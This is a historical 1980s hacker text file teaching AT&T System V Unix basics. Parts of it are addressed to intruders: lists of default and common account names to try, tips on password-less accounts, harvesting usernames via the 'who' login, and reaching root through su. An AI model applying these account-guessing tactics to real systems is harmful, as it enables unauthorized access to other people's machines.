home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 1 / HACKER1.ISO / hack / unix.001 < prev    next >
Text File  |  1992-09-06  |  141KB  |  2,814 lines

  1.                 *************************************************
  2.                 *************************************************
  3.                 **                                             **
  4.                 **         Unix Use and Security From          **
  5.                 **              The Ground Up                  **
  6.                 **                                             **
  7.                 **                   by                        **
  8.                 **                                             **
  9.                 **              The Prophet                    **
  10.                 **                                             **
  11.                 **                                             **
  12.                 *************************************************
  13.                 *************************************************
  14.  
  15.  
  16. INTRODUCTION
  17. ------------
  18.         The Unix operating system is one of the most heavily used mainframe 
  19. operating systems today. It runs on many different computers (Dec VAX's, AT&T's 
  20. 3bx series, PDP-11's, and just about any other you can think of- including 
  21. PC's), and there are many different, but pretty much similar, versions of it. 
  22. These Unix clones go by many different names- here are the most common: Xenix, 
  23. Ultrix, Ros, IX/370 (for the IBM 370), PCIX (for the IBM PC), and Berkely (BSD) 
  24. Unix. This file will concentrate on AT&T System V Unix, probably the most 
  25. heavily used version. (The next most heavily used is Berkely Unix.) This file 
  26. will cover just about everything all but THE most advanced hacker will need to 
  27. know about the Unix system, from the most rodent information to advanced 
  28. hacking techniques. This is the second version of this file, and as I discover 
  29. any errors or new tricks, I will update it. This file is, to the best of my 
  30. knowledge, totally accurate, however, and the techniques in it will work just 
  31. as described herein. Note, that these techniques will work on System V Unix. 
  32. Not necessarily all, but most, should work on most other versions of Unix as 
  33. well.
  34.  
  35.  
  36. I welcome any suggestions, corrections, or feedback of any kind. And lastly, 
  37. thanks for taking the time to read this:
  38.  
  39. THE USUAL DISCLAIMER:
  40. ---------------------
  41.         This file is for [of course] informational purposes only. <Snicker> I 
  42. don't take responsibility for anything anyone does after reading this file.
  43. _______________________________________________________________________________
  44.  
  45.  
  46. IDENTIFYING UNIX SYSTEMS AND LOGGING IN
  47. ---------------------------------------
  48.         A Unix system can easily be identified by its prompts. When you first 
  49. connect to a Unix system, you should receive the login prompt, which is usually 
  50. "Login:" (Note, that the first character may or may not be capitalized.) On 
  51. some systems, this prompt may be ";Login:" or "User:" (Again, the first letter 
  52. may or may not be capitalized.) This may be preceded by a short message, 
  53. (usually something like "WARNING!!! This system is for authorized users 
  54. only!"), the name of the company that owns the system, or the uucp network name 
  55. of the system. (The uucp facilities will be explained in detail later.) At this 
  56. point, you should enter the user name and press return. (You should be in 
  57. lowercase if your terminal supports it.) You should then receive the password 
  58. prompt, "Password:" (And yet again, the "P" may or may not be capitalized.) At 
  59. this point, you should enter your password and press return. If you have 
  60. specified the correct username/password pair, you will then be admitted into 
  61. the system. If you have entered a non-existant username or an incorrect 
  62. password, you will receive the message "Login incorrect" and will be returned 
  63. to the login prompt. There is little information given before login, and there 
  64. is no way to find valid usernames from pre-login information.
  65.         There are no "default" passwords in Unix. When the system is initially 
  66. set up, none of the default accounts or any of the accounts created by the 
  67. system operators has a password, until the system operator or the account owner 
  68. set one for the account. Often, lazy system operators and unwary users do not 
  69. bother to password many (and in some cases, all) of these accounts. To log in 
  70. under an account that doesn't have a password, you have only to enter the 
  71. username at the login prompt. 
  72.         You may encounter some occasional error messages when attempting to log 
  73. in under certain accounts. Here are some of the more common messages, and their 
  74. causes:
  75.         1. "Unable to change directory to /usr/whatever"-This means that the 
  76.                 account's home directory, the directory which it is placed in
  77.                 upon logon, does not exist. On some systems, this may prevent
  78.                 you from logging under that account, and you will be returned
  79.                 to the login prompt. On other systems, you will simply be
  80.                 placed in the root directory. If this is the case, you will
  81.                 see the message "Changing directory to '/'".
  82.         2. "No shell"-this means that the account's shell, or command 
  83.                 interpreter does not exist. On some systems, the account will
  84.                 not be allowed to log in, and you will be returned to the login
  85.                 prompt. On other systems, the account will be admitted into the
  86.                 system using a default shell, usually the Bourne shell. (The 
  87.                 shell will be explained later.) If this is the case, you will
  88.                 see the message "Using /bin/sh".
  89.  
  90.  
  91. UNIX ACCOUNTS
  92. -------------
  93.         There are two types of Unix accounts-user and superuser accounts. User 
  94. accounts are the normal user accounts. These accounts have no privileges. 
  95. Superuser accounts are the system operator accounts. These accounts have full 
  96. privileges, and are not bound by the file and directory protections of other 
  97. users. In Unix, there is no hierarchy of privileges-either an account has full 
  98. privileges, or it has none.
  99.         Unix usernames are up to 14 characters long, but usually are within the 
  100. range of 1-8. The usernames can contain almost any characters, including 
  101. control and special characters. (The accounts will usually not contain the 
  102. characters @, control-d, control-j, or control-x, as these characters have 
  103. special meanings to the Unix operating system.) The Unix system comes initially 
  104. configured with quite a few default accounts, some of which are superuser and 
  105. some of which are only user-level accounts. Here is a list of the default 
  106. accounts which usually have superuser privileges:
  107. root (Always!)
  108. makefsys
  109. mountfsys
  110. umountfsys
  111. checkfsys
  112.  
  113. The root account is always present on the system, and always has superuser 
  114. capabilities. (Note: most Unix System V systems come initially set up with a 
  115. security feature that prevents superuser accounts from logging in remotely. If 
  116. you attempt to log in under a superuser account remotely on a system with this 
  117. feature, you will receive the message "Not on console", and will be refused 
  118. admission to the operating system. This will NOT prevent you from using 
  119. superuser accounts remotely-you simply have to log in under a user account and 
  120. then switch over to a superuser account using the su utility, which will be 
  121. described later.)
  122. Here is a list of the user-level default accounts:
  123. lp
  124. daemon
  125. trouble
  126. nuucp
  127. uucp
  128. bin
  129. rje
  130. adm
  131. sysadm
  132. sync
  133.  
  134. The bin account, although it is only a user account, is particularly powerful, 
  135. as it has ownership of many of the system's important directories and files. 
  136. Although these are the only default accounts on System V Unix, there are many 
  137. other accounts which I have found to be common to many Unix systems. Here is a 
  138. list of some of the accounts I have found on many Unix systems:
  139. batch           admin           user            demo            test
  140. field           unix            guest           pub             public
  141. standard        games           general         student         help
  142. gsa             tty             lpadmin
  143.  
  144. Also try variations on the account names, such as rje1, rje2, user1, user2, 
  145. etc. Also, try variations on people's names and initials, such as doej, doe,
  146. john, johnd, jjd, etc.
  147.         No matter what the format for the usernames, one thing is common to all 
  148. systems-almost all of the usernames will begin with a lowercase letter. There 
  149. is a good reason for this-when logging into the system, if the first character 
  150. of the username you type in is in uppr-case, the system automatically assumes 
  151. that your terminal does not support lower-case. It will then send all output to 
  152. you in upper-case, with characters that are supposed to be upper-case preceded 
  153. by a backslash ("\", the Unix escape character), to differentiate them from the 
  154. characters which are meant to be in lower-case. Unix *always* differentiates 
  155. between the cases, so it is best to stay in lower-case while on the system.
  156.         As mentioned before, there are no "default" passwords on Unix. When an 
  157. account is created, it has no password, until the superuser or the account's 
  158. owner sets one for it. Unix passwords are a maximum of 11 characters. The 
  159. password may contain any character, and the system distinguishes between upper 
  160. and lower case characters. Many Unix systems implement a special security 
  161. feature under which passwords must contain at least 2 non-alphanumeric 
  162. characters (similar to Compuserve's password protection). Yet another password 
  163. security feature of Unix allows the superuser to set an expiration date on 
  164. users' passwords.
  165.  
  166.  
  167. COMMAND LOGINS
  168. --------------
  169.         Many systems have accounts known as "command logins". These are 
  170. accounts that log in, execute a single command, and are then logged out. These 
  171. accounts rarely have passwords. Here is a list of common command logins:
  172. who     -This is a particularly useful command login. When you enter this at
  173.         the username of a system with this particular account, the system will
  174.         display a list of the users currently on the system. A good way to get
  175.         valid usernames to hack.
  176. time    -Not very useful. Just displays the time.
  177. date    -Ditto the above, but displays the current date. Great if you don't 
  178.         have a calendar.
  179. sync    -This default account is sometimes set up as a command login. It merely
  180.         executes the sync command, which causes any data which is meant to be
  181.         stored to be written to disk.
  182.  
  183. UNIX SPECIAL CHARACTERS
  184. -----------------------
  185.         The Unix operating system interprets certain characters in special 
  186. ways. Provided here is a list of those special characters, and their meanings 
  187. to the Unix operating system:
  188.  
  189. Control-D       -This is the Unix end-of-file character.
  190. Control-J       -Some systems interpret this, rather than Control-M, as the 
  191.                 return character, while others may use both. The vast majority, 
  192.                 however, will only use Control-M.
  193. Control-Delete  -This is the Unix kill character. It will automatically end 
  194.                 your current process.
  195. @               -Some systems use this as the kill character.
  196. \               -This is the Unix escape character. Its main use it to 
  197.                 differentiate between upper- and lower-case characters when 
  198.                 logged in on a terminal that only supports upper-case. For 
  199.                 instance, if you wanted to send the command "cd /Mrs/data",
  200.                 (never mind what it does right now), you would type this:
  201.                 (this is how it would look on your upper-case only terminal)
  202.                 CD /\MRS/DATA
  203.                 The backslash before the M would let the system know that the M 
  204.                 supposed to be upper-case, while the others would simply be 
  205.                 interpreted as lower-case.
  206.  
  207.         The characters will rarely be used in usernames and passwords because 
  208. of the way they are interpreted. Note, however, that these values may usually 
  209. be changed once inside the system using the stty command, which will be 
  210. explained later. for instance, the end of file character could be changed to 
  211. control-A if you wished.
  212.  
  213. THE UNIX SHELL
  214. --------------
  215.         The Unix shell is the command interpreter program that accepts your 
  216. input and carries out your commands. It is NOT the operating system itself, it 
  217. is the interface between the user and the operating system. The shell is a 
  218. program that is executed when you are logged in, and when you end the shell 
  219. program, you are logged out of the system. There is nothing special about the 
  220. shell program-it is just a regular program, like any other on the Unix system. 
  221. In fact, once you are logged on, you can execute another shell just as you 
  222. would execute a program. This ability, to run multiple shell levels, can be 
  223. used to perform some interesting tricks that will be detailed later in this 
  224. file. There is also more than one kind of shell. All the shells perform the 
  225. same basic function of interpreting the user's commands, but there are a few 
  226. differences. Here is a list of the different shells, their unique 
  227. characteristics, and how to tell which shell you are using:
  228.  
  229. Shell
  230. -----
  231. sh      -This is the Bourne shell, the standard shell of Unix System V, and the
  232.         focus of this file. This shell gives user-level accounts a command 
  233.         prompt of "$", and "#" for superuser accounts. On Berkely BSD Unix,
  234.         this shell gives an ampersand ("&") prompt.
  235.  
  236. csh     -This is the C shell, developed by the Berkely University Science 
  237.         department. This shell is pretty much the same as the Bourne shell, but
  238.         features different shell programming control structures [shell 
  239.         programming will be explained later, in the section on Unix software
  240.         development], and has a few luxuries such as aliasing (giving a command 
  241.         or a series of commands a new name), and it keeps a history of the 
  242.         commands you enter. This shell gives a "%" prompt for user accounts and
  243.         a "#" prompt for superuser accounts. 
  244.  
  245. ksh     -This is the new, Korn shell. This shell combines features of both the 
  246.         Bourne shell and the C shell. It boasts the Bourne shell's easier shell
  247.         programming, along with the C shell's aliasing and history. Its prompts
  248.         are "$" for users and "#" for superusers.
  249.  
  250. rsh     -This is the restricted Bourne shell. It is used for accounts that the
  251.         superuser wishes to restrict the commands available to. It will not 
  252.         allow you to execute commands outside of your searchpath (which will be
  253.         explained later, also, in the section on software development), and 
  254.         will not let you change directories or change the values of shell
  255.         variables. In all other respects, it is similar to the Bourne shell. A 
  256.         later section of this file will detail ways to overcome the
  257.         restrictions of this shell.
  258.  
  259. ua      -This is a lousy, menu-driven shell for the AT&T Unix PC. (Yes, there
  260.         are some of those with dialups!) It implements a lousy windowing
  261.         system that is SLOOOW, even at 2400 baud. Luckily, you can exit to the
  262.         Bourne shell from the ua shell.
  263.  
  264.         These are by no means all of the shells you will run across. These are 
  265. only the "official" shells provided by the distributors of the Unix operating 
  266. system. I've run across many "home-made" shells in my time. Also, any compiled 
  267. program can be used as a shell. For instance, I've used systems run by 
  268. businesses where one account logged in using an accounting program as a shell. 
  269. This prevented the account from being used to do anything other than use the 
  270. accounting program. Other good examples of this are the command logins-the who 
  271. command login, for example, uses the who program as its shell. When the program 
  272. is finished, the account is logged out. You will most definitely encounter 
  273. other such accounts as you hack Unix.
  274.  
  275. UNIX FILES AND DIRECTORIES
  276. --------------------------
  277.         Unix files and directories are referenced with pathnames, a la MS-DOS.
  278. If you are familiar with MS-DOs, then you should have no problem understanding 
  279. this section. Unix files and directories are referenced in the almost the exact 
  280. same way-the only difference is that it uses the "/" character, not the 
  281. backslash, to separate the directories in the pathname.
  282.         Pathnames are a simple concept to understand, but are difficult to 
  283. explain. Imagine the system's files and directories laid out in a tree fashion, 
  284. like this:
  285.                                 / (root directory)
  286.                                 :
  287.                                 :
  288.                         -------------------------
  289.                         :                       :
  290.                         :                       :
  291.                         usr (dir)              bill (dir)
  292.                         :                       :
  293.                  --------------           --------------
  294.                  :            :           :            :
  295.               junk (file)  source (dir)  memo (file)  names (file)
  296.                               :
  297.  
  298. "/" is the root directory. This is the top directory in the system tree, and 
  299. all other files and directories are referenced in relation to this directory. 
  300. The root directory has 2 subdirectories in it, "usr" and "bill". In the usr 
  301. directory, there is a file called "junk" and an empty directory called 
  302. "source". In the directory bill, there are 2 files, "memo" and "names". You 
  303. specify pathnames by starting at the top of the system, "/", and tracing your 
  304. way down the system tree to the file or directory you wish to reference, 
  305. separating each directory you must pass through to get to it with a slash. For 
  306. instance, the pathname of the file "junk" would be "/usr/junk". The pathname of 
  307. the usr directory would be "/usr". The pathname of the source directory would 
  308. be "/usr/source". The pathname of the bill directory would be "/bill", and the 
  309. pathnames of the 2 files which reside in it would be "/bill/memo" and 
  310. "/bill/names".
  311.         Files and directories can also be referenced by their base names if 
  312. they are in your current directory. For instance, if you were in the directory 
  313. "usr", you could reference the file "/usr/junk" by its base name, "junk". If 
  314. you were in the root directory, you could reference the bill directory by its 
  315. base name, "bill". You can reference the file directly above your current 
  316. directory in the system tree as ".." and your current directory can be 
  317. referenced as "."
  318.         Unix file and directory names can be up to 14 characters in length. The
  319. filename can contain any ASCII character, including control characters, except
  320. a space. It may contain both upper- and lower-case, and Unix does distinguish
  321. between the two. Unix does not use filename extensions, a la VMS or MS-DOS, to 
  322. show the kind of file a file is. A period, in Unix, is just another character 
  323. in the filename, not a separator between 2 fields in the name. File names which 
  324. begin with a period are called "hidden" files-that is, they are only revealed 
  325. if you issue a special command.
  326.         There are 3 kinds of files in Unix. These are text files, binary files,
  327. and device files. Text files are just what you'd think they are from the name-
  328. files of ASCII text, just like what you're reading right now. Binary files are
  329. executable machine-code files. (There are also executable text files, called 
  330. shell scripts, that will be explained in detail in the section on Unix software 
  331. development.) Device files are files that represent the system's I/O devices-
  332. disk drives, terminals, etc. Remember, that Unix was created as an enviroment 
  333. for software development. Its designers wished for programs written for Unix 
  334. systems to be as transportable between different models of machines running 
  335. the operating system as possible. By representing the I/O devices as files, 
  336. they eliminated the incompatability in the code that handled I/O. The program 
  337. simply has to read and write from/to the file, and the Unix operating system 
  338. handles the system-dependant details.
  339.  
  340. BASIC UNIX COMMANDS
  341. -------------------
  342.         This section will describe some basic Unix commands, and detail how to 
  343. get further help on-line. It will briefly provide the syntax for a few commands 
  344. you will find necessary to know in order to find your way around on the system.
  345.         Unix will usually only require that you use the base name of a file or 
  346. directory you wish to reference if it is in the directory you are currently in. 
  347. Most commands will also let you specify full pathnames if you wish to reference 
  348. files in other parts of the system. Most commands will also let you use several 
  349. wildcard characters when referencing files and directories. These are:
  350. ?       -This means to accept any single character in the place of the question
  351.         mark. For instance, "t?m" would include both "tom" and "tim".
  352.  
  353. *       -This means to accept any character, group of characters, or nothing in
  354.         the position of the asterisk. For example, "t*m" would include "thom",
  355.         "tom", and "tim".
  356. []      -This means to accept any character within the brackets in the position 
  357.         of the brackets. For instance, "t[oia]m" would include "tom", "tim", 
  358.         and "tam". You can also specify a range of characters in the brackets 
  359.         by using a hyphen. For instance, "t[a-c]m" would include "tam", "tbm",
  360.         and "tcm".
  361.  
  362.         Most commands and programs in Unix take their input from the keyboard 
  363. and send their output to the screen. With most commands and programs, however, 
  364. you can instruct them to draw their input from a text file and redirect their 
  365. output to another file instead. For instance, assume there is a program on the 
  366. system called "encrypter", that takes its input from the keyboard, encrypts it, 
  367. and displays the encrypted data on the screen. You could instruct the program 
  368. to take its input, instead, from a previously prepared text file using the 
  369. input redirection character, "<". In Unix, as in MS-DOs (which is based in part 
  370. on Unix), you execute a program by typing its name. You wish the program to 
  371. take its input from a file in the directory you are currently in called 
  372. "top_secret". You would type "encrypter < top_secret". The program would then 
  373. read in the contents of the file top_secret and encrypt it, then print out the 
  374. encrypted form on the screen. Suppose you wanted to use the encrypter program 
  375. to encrypt files you wished to keep private? You could redirect the encrypted 
  376. output from the screen into another file. To do this, you would use the output 
  377. redirection character, ">". Say, you wished to save the output in a file called 
  378. "private". You would type "encrypter < top_secret > private". The encrypter 
  379. program would then read in the contents of the file top_secret and write the 
  380. encrypted output into the file "private". Nothing would be displayed to the 
  381. screen. If the file private does not exist, it will be created. If it 
  382. previously existed, its contents will be erased and replaced with the output 
  383. from the encrypter program. Perhaps you would want to add to the contents of a 
  384. file rather than replace its contents? This is done with ">>". The command 
  385. "encrypter < top_secret >> private" would append the output from the encrypter 
  386. to the current contents of the file private. Again, if the file private does 
  387. not already exist, it will be created.
  388.         Most commands have one or more options that you can specify. These are 
  389. placed after the command itself in the command line, and preceded by a hyphen. 
  390. For instance, let's say that the encrypter program had an option called 
  391. "x", which caused it to use a different encoding algorithm. You would 
  392. specify it by typing "encrypter -x". If a command has two or more options, you
  393. can usually specify one or more together in a stream. For instance, let's say 
  394. that the encrypter program has 2 options, x and y. You could specify both like 
  395. this: "encrypter -xy". If one or more of the options requires an argument, for 
  396. example the x option requires a 2 character key, you can specify the options 
  397. separately, like this: "encrypter -xaa -y", where aa is the 2-character key. 
  398.         The pipe character, "|", is used to channel the output of one command 
  399. or program into the input of another. For instance, suppose you had a command 
  400. called "report" that formatted documents into report format, and you had a file 
  401. called "myreport" that you wished to view in the report format. You could type:
  402. "cat myreport" | report". This would type out the contents of the file myreport 
  403. to the report command rather than the screen, and the report command would 
  404. format it and display it on the screen. (Note: this example could have been 
  405. done with I/O redirection by typing "report < myreport"...but it makes a good 
  406. example of the use of pipes.)
  407.         You can choose to execute commands and programs in the background-that 
  408. is, the command executes, but you are free to carry out other tasks in the 
  409. meantime. To do this, type in the command line, followed by " &". For instance, 
  410. "rm * &" would delete all the files in the directory, but your terminal would
  411. not be tied up. You would still be free to perform other tasks. When you do 
  412. this, the system will print out a number and then return you to the system 
  413. prompt. This number is the process number of the command. Process numbers will 
  414. be explained later in this section in the entry for the command "ps". The 
  415. command can be stopped before its completion with the kill command, also 
  416. explained in this section. Example:
  417.         $rm * &
  418.         1234
  419.         $
  420.  
  421. Note that when you use background processing, the command or program will still 
  422. takes its input from the keyboard (standard input device) and send its output 
  423. to the screen (standard output device), so if you wish for the command to work 
  424. in the background without disturbing you, you must redirect its input (if any) 
  425. and its output (if it's to the screen).
  426.  
  427. THE COMMANDS
  428. ------------
  429.  
  430. ls      -This command lists the files and subdirectories in a directory. If you 
  431.         simply type "ls", it will display the files in your current directory. 
  432.         You can also specify the pathname of another directory, and it will 
  433.         display the files in it. It will not display hidden files (files whose
  434.         name begins with a period). 
  435.  
  436.         Options:
  437.         a       -This option will display all files, including hidden files.
  438.  
  439.         Example:
  440.         $ ls -a
  441.  
  442.         .       ..      junk    source
  443.         $
  444.  
  445. cd      -This is the command used to move from one directory to another. To go 
  446.         to a directory directly below your current directory, type "cd 
  447.         <dirname>". To move up to the directory directly above your current 
  448.         directory, type "cd .."  You can also jump to any directory in the 
  449.         system from any other directory in the system by specifying the path-
  450.         name of the directory you wish to go to, such as "cd /usr/source".
  451.  
  452.         Example:
  453.         $cd /usr/source
  454.         $
  455.  
  456. pwd     -This prints out the pathname of the directory you are currently in. 
  457.         Useful if you forget where you're at in the system tree.
  458.  
  459.         Example:
  460.         $pwd
  461.         /usr/source
  462.  
  463. cat     -Displays the contents of a text file on the screen. The correct syntax 
  464.         is "cat <filename>". You can use basenames or pathnames.
  465.  
  466.         Example:
  467.         $cat memo
  468.         Bill, 
  469.           Remember to feed the cat!
  470.         -Martha
  471.         $
  472.  
  473. rm      -This deletes a file. Syntax: "rm <filename>".
  474.  
  475.         Example:
  476.         $rm junk
  477.         $
  478.  
  479. cp      -Copies a file. Syntax: "cp file1 file2", where file1 is the file you
  480.         wish to copy, and file2 is the name of the copy you wish to create. If 
  481.         file2 already exists, it will be overwritten. You may specify pathnames
  482.         for one or both arguments.
  483.  
  484.         Example:
  485.         $cp /usr/junk /usr/junk.backup
  486.  
  487. stty    -Displays/sets your terminal characteristics. To display the current 
  488.         settings, type "stty". To change a setting, specify one of the options
  489.         listed below.
  490.  
  491.    Options:
  492.    echo         -System echoes back your input.
  493.    noecho       -System doesn't echo your input.
  494.    intr 'arg'   -Sets the break character. The format is '^c' for control-c, 
  495.                 etc. '' means no break character.
  496.    erase 'arg'  -Sets the backspace character. Format is '^h' for control-h,
  497.                 etc. '' means no backspace character.
  498.    kill 'arg'   -Sets the kill character (which means to ignore the last line
  499.                 you typed). Format is the same as for intr and erase, 
  500.                 '^[character]', with '' meaning no kill character.
  501.  
  502.         Example:
  503.         $stty intr '^c' erase '^h'
  504.         $stty
  505.         stty -echo intr '^c' erase '^h' kill '^x'
  506.         
  507. lpr     -This command prints out a file on the Unix system's printer, for you 
  508.         to drop by and pick up (if you dare!) The format is "lpr <filename>".
  509.  
  510.         Example:
  511.         $lp junk
  512.  
  513. ed      -This is a text file line editor. The format is "edit <filename>". The 
  514.         file you wish to modify is not modified directly by the editor; it is 
  515.         loaded into a buffer instead, and the changes are only made when you 
  516.         issue a write command. If the file you are editing does not already 
  517.         exist, it will be created as soon as issue the first write command. 
  518.         When you first issue the edit command, you will be placed at the
  519.         command prompt, ":" Here is where you issue the various commands. Here
  520.         is list of some of the basic editor commands.
  521.         #       -This is any number, such as 1, 2, etc. This will move you down 
  522.                 to that line of the file and display it.
  523.         d       -This deletes the line you are currently at. You will then be
  524.                 moved to the previous line, which will be displayed.
  525.         a       -Begin adding lines to the file, just after the line that you 
  526.                 are currently on. This command will put you in the text input
  527.                 mode. Simply type in the text you wish to add. To return to the
  528.                 command mode, type return to get to an empty line, and press
  529.                 the break key (which is whatever character you have set as your
  530.                 break key). It is important to set the break character with 
  531.                 stty before you use the editor!
  532.         /       -Searches for a pattern in the file. For example, "/junk" would
  533.                 search the file from your current line down for the first line
  534.                 which contains the string "junk", and will move you to that 
  535.                 line if it finds one.
  536.         i       -Insert. Works similar to a, except that the text is inserted
  537.                 before the line you are currently on.
  538.         p       -Prints out a line or lines in the buffer. "p" by itself will
  539.                 display your current line. "#p" will display the line "#". 
  540.                 You may also specify a range of lines, such as "1,3p" which
  541.                 will display lines 1-3. "1,$p" will print out the entire file.
  542.         w       -Write the changes in the buffer to the file.
  543.         q       -Quit the editor.
  544.  
  545.         Example:
  546.         $edit myfile
  547.         Editing "myfile" [new file]
  548.         0 lines, 0 characters
  549.         :a
  550.         I am adding stupid text to myfile.
  551.         This is a test.
  552.         ^c [this is assumed as a default break character in this example]
  553.         :1,$p
  554.         I am adding stupid text to myfile.
  555.         This is a test.
  556.         :2
  557.         This is a test.
  558.         :d
  559.         I am adding stupid text to myfile.
  560.         :w
  561.         :q
  562.         $
  563.  
  564. grep    -this command searches for strings of text in text files. The format is
  565.         grep [string] [file]. It will print out every line in the file that 
  566.          contains the string you specified.
  567.  
  568.         Options:
  569.         v       -Invert. This will print out every line that DOESN'T contain
  570.                 the string you specified.
  571.  
  572.         Example:
  573.         $ grep you letter
  574.         your momma!
  575.         I think you're going to get caught.
  576.         $
  577.  
  578. who     -This will show the users currently logged onto the system.
  579.  
  580.         Example:
  581.         $ who
  582.  
  583.         root    console Mar 10  01:00
  584.         uucp    contty  Mar 30  13:00
  585.         bill    tty03   Mar 30  12:15
  586.         $
  587.         Now, to explain the above output: the first field is the username of 
  588.         the account. The second field shows which terminal the account is on.
  589.         Console is, always, the system console itself. On many systems where
  590.         there is only one dialup line, the terminal for that line is usually 
  591.         called contty. the tty## terminals can usually be either dialups or
  592.         local terminals. The last fields show the date and time that the user
  593.         logged on. In the example above, let's assume that the current time and
  594.         date is March 30, and the time is 1:00. Notice that the time is in 24 
  595.         hour format. Now, notice that the root (superuser) account logged in on
  596.         March 10! Some systems leave the root account logged in all the time on
  597.         the console. So, if this is done on a system you are using, how can you
  598.         tell if the system operator is really online or not? Use the ps 
  599.         command, explained next.
  600.  
  601. ps      -This command displays information about system processes.
  602.  
  603.         Options:
  604.         u       -this displays information on a specific user's processes. For
  605.                 instance, to display the root account's processes:
  606.                 $ ps -uroot
  607.  
  608.                 PID     TTY     TIME    CMD
  609.                 1234    console 01:00   sh
  610.                 1675    ?       00:00   cron
  611.                 1687    console 13:00   who
  612.                 1780    tty09   12:03   sh
  613.  
  614.                 Now, to explain that: The first field is the process number. 
  615.                 Each and every time you start a processes, running a program,
  616.                 issueing a command, etc., that process is assigned a unique 
  617.                 number. The second is which terminal the process is being run
  618.                 on. The third field is when the process was started. The last
  619.                 field is the base name of the program or command being run.
  620.                 A user's lowest process number is his login (shell) process.
  621.                 Note that the lowerst process in the above example is 1234. 
  622.                 This process is being run on the console tty, which means the
  623.                 superuser is logged on at the system console. Note the ? as the
  624.                 tty in the next entry, for the cron process. You can ignore any
  625.                 processes with a question mark as the terminal. These processes
  626.                 are not bewing carried out by a user; they are being carried
  627.                 out by the system under that user's id. Next, note the entry
  628.                 for process # 1687, on the console terminal, "who". this means
  629.                 that the superuser is executing the who command...which means
  630.                 he is currently actively on-line. The next entry is interest-
  631.                 ing...it shows that the root user has a shell process on the 
  632.                 terminal tty09! This means that someone else is logged in
  633.                 under the root account, on tty09. If more than one person is
  634.                 using an account, this option will display information for all
  635.                 of them, unless you specify the next option...
  636.  
  637.         t       -This allows you to select processes run on a specific term-
  638.                 inal. For example:
  639.                 $ps -t console
  640.                 will show all the processes currently being run on the console.
  641.  
  642.                 Example:
  643.                 Remember, options can usually be combined. This will show all
  644.                 the root user's processes being run on the system console:
  645.                 $ ps -uroot -tconsole
  646.  
  647.                 PID     TTY     TIME    CMD
  648.                 1234    console 01:00   sh
  649.                 1687    console 13:00   who
  650.                 $
  651.  
  652. kill    -Kills processes. Syntax: kill [-#] process#. You must know the process
  653.         number to kill it. You can, optionally, specify an option of 1-9, to
  654.         determine the power of the kill command. Certain kinds of processes,
  655.         like shell processes, require more power to kill. Kill -9 will stop any
  656.         process. You must have superuser capabilities fo kill another user's
  657.         processes (unless he's using your account).
  658.  
  659.         Example:
  660.         $kill -9 1234
  661.         1234 killed.
  662.         $
  663.  
  664. write   -This command is for on-line realtime user to user communications. To 
  665.         communicate with a user, type "write <username>". If more than one
  666.         person is logged in under that user name, you must specify a specific
  667.         terminal you wish to speak to. When you do this, the person you wish
  668.         to communicate with will see:
  669.         Message from [your account name] tty## [<--your terminal]
  670.  
  671.         Now you can type messages, and they will be displayed on that person's
  672.         terminal when you press return. When you are finished, press control-D
  673.         to quit.
  674.  
  675.         Example:
  676.         $ write root
  677.         Fuck you I'm a hacker!  [This is not advised.]
  678.         ^d
  679.         $
  680.  
  681. mail    -The Unix mail facilities, used to send/receive mail. To send mail, 
  682.         type "mail <username>". Enter your message and press control-d to send.
  683.         To read your mail, type "mail". Your first letter will be displayed,
  684.         and then you will be given a "?" prompt.  
  685.         Here are the legal commands you give at this point: 
  686.         ##      -Read message number ##.
  687.         d       -Delete last message read.
  688.         +       -Go to next message.
  689.         -       -Move back one message.
  690.         m       -Send mail to user.
  691.         s       -Save last message read. You can specify the name of the file
  692.                 to which it is saved, or it will be saved to the default file,
  693.                 mbox.
  694.         w       -Same as s, but will save the message without the mail file
  695.                 header.
  696.         x       -Exit without deleting messages that have been read.
  697.         q       -Exit, deleting messages that have been read.
  698.         p       -Print last message read again.
  699.         ?       -Lists these commands.
  700.  
  701.         Examples:
  702.         To send mail:
  703.         $ mail root
  704.         Hi bill! This is a nice system.
  705.         -John
  706.         ^d
  707.         $
  708.         To read mail:
  709.         $ mail
  710.         From john Thu Mar 13 02:00:00  1986
  711.         Hi bill! This is a nice system.
  712.         -John
  713.         ? d
  714.         Message deleted.
  715.         ?q
  716.         $
  717.  
  718. crypt   -This is the Unix file encryption utility. Type "crypt". You will then
  719.         be prompted to enter the password. You then enter the text. Each line
  720.         is encrypted when you press return, and the encrypted form is displayed
  721.         on the screen. So, to encrypt a file, you must use I/O redirection.
  722.         Type "crypt [password] < [file1] > [file2]". This will encrypt the con-
  723.         tents of file1 and place the encrypted output in file2. If file 2 does
  724.         not exist, it will be created.
  725.  
  726. passwd  -This is the command used to change the password of an account. The
  727.         format is "passwd <account>". You must have superuser capabilities to
  728.         change the password for any account other than the one you are logged
  729.         in under. To change the password of the account you are currently
  730.         using, simply type "passwd". You will then be prompted to enter the
  731.         current password. Next, you will be asked to enter the new password.
  732.         Then you will be asked to verify the new password. If you verify the
  733.         old password correctly, the password change will be complete. (Note:
  734.         some systems use a security feature which forces you to use at least
  735.         2 non-alphanumeric characters in the password. If this is the case with
  736.         the system you are on, you will be informed so if you try to enter a
  737.         new password that does not contain at least 2 non-alphanumeric char-
  738.         acters.)
  739.  
  740. su      -This command is used to temporarily assume the id of another account.
  741.         the format is "su <account>". If you don't specify an account, the
  742.         default root is assumed. If the account has no password, you will then
  743.         assume that account's identity. If it does have a password, you will
  744.         be prompted to enter it. Beware of hacking passwords like this, as the
  745.         system keeps a log of all attempted uses, both successful and un-
  746.         successful, and which account you attempted to access.
  747.  
  748. mkdir   -This command creates a directory. the format is "mkdir <dirname>".
  749.  
  750. rmdir   -This command deletes a directory. The directory must be empty first.
  751.         The format is "rmdir <dirname>".
  752.  
  753. mv      -Renames a file. The syntax is "mv [oldname] [newname]". You can use
  754.         full pathnames, but the new name must have the same pathname as the
  755.         old name, except for the filename itself.
  756.  
  757. -------------------------------------------------------------------------------
  758.         Further help can usually be gained from the system itself. Most systems 
  759. feature on-line entries from the Unix System User's Manual. You can read these 
  760. entries using the man command. The format is "man <command>". Some Unix System 
  761. V systems also feature a menu-driven help facility. Simply type "help" to 
  762. access it. This one will provide you with a list of commands, as well as with 
  763. the manual entries for the commands.
  764. -------------------------------------------------------------------------------
  765.  
  766. UNIX FILE AND DIRECTORY PROTECTIONS
  767. -----------------------------------
  768.         Every Unix account is assigned a specific user number, and a group 
  769. number. This is how the system identifies the user. Therefore, 2 accounts with 
  770. different usernames but the same user number would be considered by the system 
  771. to be the same id. These user and group numbers are what Unix uses to determine 
  772. file and directory access privileges.
